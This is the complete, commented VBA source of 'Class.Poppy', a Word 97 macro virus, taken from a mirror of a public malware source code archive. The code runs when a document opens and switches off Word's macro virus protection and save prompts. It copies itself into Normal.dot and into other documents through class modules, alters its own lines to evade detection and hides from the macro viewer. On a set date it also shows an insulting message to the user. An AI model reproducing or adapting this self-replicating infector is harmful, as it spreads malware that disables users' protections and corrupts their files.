mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-07-03 00:43:34 +00:00
2021-01-12 18:07:35 -06:00

129 lines
2.5 KiB

'Word 97 Class Object Infector
'First Ever Class Object Infetor
Sub AutoOpen()
' AutoOpen Sub In Document
On Error GoTo out
' Handle Errors
Options.VirusProtection = False
' Turn Off Virus Protection
Options.SaveNormalPrompt = False
' Turn Off Normal.dot Save Prompt
Options.ConfirmConversions = False
' Turn Off Conversion Prompt (from 95 -> 97)
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
' Count The Number Of Code Lines In The Document
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
' Count The Number Of Code Lines In The Normal.dot
If nt > 70 And ad > 0 Then GoTo out
' If We Are Installed In Both (Lines > 0 and 72) Then Exit
If nt < 70 Then
' If We Are Not In The Normal.dot (Lines < 72) Then Install Us
Set infect = NormalTemplate.VBProject.VBComponents.Item(1)
' Set Normal.dot Class Section As Infect Object (What We Want To Infect)
ActiveDocument.VBProject.VBComponents.Item(1).Name = infect.Name
' Swamp The Class Section Names (Active Doc <- Normal Template)
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
' Export Our Virus Code
End If
If ad = 0 Then Set infect = ActiveDocument.VBProject.VBComponents.Item(1)
' If We Are Not In The Active Doc (Lines < 0) Then Install Us
If Day(Now) = 14 And (Month(Now) > 5) Then MsgBox "I Think " & Application.UserName & " is a big stupid jerk!", 0, "VicodinES Loves You / Class.Poppy"
' If The Day And Time Are Right Insult The User
infect.codemodule.AddFromFile ("c:\class.sys")
' Use The Infect Object - Import Your Virus Code
With infect.codemodule
' With The Newly Infected Class Object
For x = 1 To 4
' Clean Up The First 4 Lines Of Header-Code
.deletelines 1
' Delete Line 1 - 4 Times
Next x
End With
If nt < 70 Then
' If We Just Infected The Normal.Dot
With infect.codemodule
.replaceline 1, "Sub AutoClose()"
' Change AutoOpen (on line 1) to AutoClose
.replaceline 71, "Sub ToolsMacro()"
' Change Sub ViewVBCode (on line 71) to ToolsMacro
End With
End If
With infect.codemodule
' With The Newly Infected Object
For x = 2 To 72 Step 2
' Use Word Object Data As Polymorpic Code On Every Other Line
.replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow
Next x
End With
If nt > 70 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
' If We Just Infected A Document Save It On Close
End Sub
Sub ViewVBCode()
' Stealth Hook
End Sub